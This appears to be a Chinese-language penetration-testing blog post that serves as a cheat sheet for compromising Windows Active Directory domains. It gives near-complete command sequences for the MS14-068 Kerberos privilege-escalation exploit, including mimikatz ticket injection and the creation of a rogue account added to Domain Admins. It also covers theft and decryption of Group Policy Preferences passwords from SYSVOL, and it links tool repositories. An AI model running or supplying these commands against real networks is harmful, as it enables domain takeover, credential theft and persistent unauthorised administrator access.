域渗透那几个技巧

作者: admin 分类: 渗透测试 发布时间: 2017-11-09 11:13

做个备份,最近用的比较多。

ms14068漏洞利用:

生成TGT:
whoami /all

python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com


ms14068.exe -u admin@xxx.com -p password -s sid -d dc.xxx.com

会生成TGT_admin@xxx.com.ccache

注入TGT:

klist
klist purge
mimikatz.exe "kerberos::ptc c:\TGT_admin@xxx.com.ccache"

若成功
dir \\dc.xxx.com\c$

net user fuckadmin xxxxx@password /add /domain
net group "Domain Admins" fuckadmin /add /domain

工具:

https://www.t00ls.net/viewthread.php?tid=28207&from=favorites
https://github.com/bidord/pykek
https://github.com/gentilkiwi/kekeo

GPP漏洞利用

密码可能存在的路径如下:

Groups.xml,
Services\Services.xml,
ScheduledTasks\ScheduledTasks.xml,
Printers\Printers.xml,
Drives\Drives.xml,
DataSources\DataSources.xml

net use \\aaainc.ad password /user:aaainc.ad\username

dir \\aaainc.ad\SYSVOL /s /a > sysvol.txt

findstr /i “groups.xml” sysvol.txt


解密过程:

set-executionPolicy bypass
powershell -ep bypass
Import-Module .\GPP.ps1
Get-DecryptedCpassword  xxxxxxxxxxxxxx

脚本:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1





参考文献:
https://www.trustedsec.com/2014/12/ms14-068-full-compromise-step-step/
http://www.polaris-lab.com/index.php/2017/01/
https://github.com/Twi1ight/AD-Pentest-Script







发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云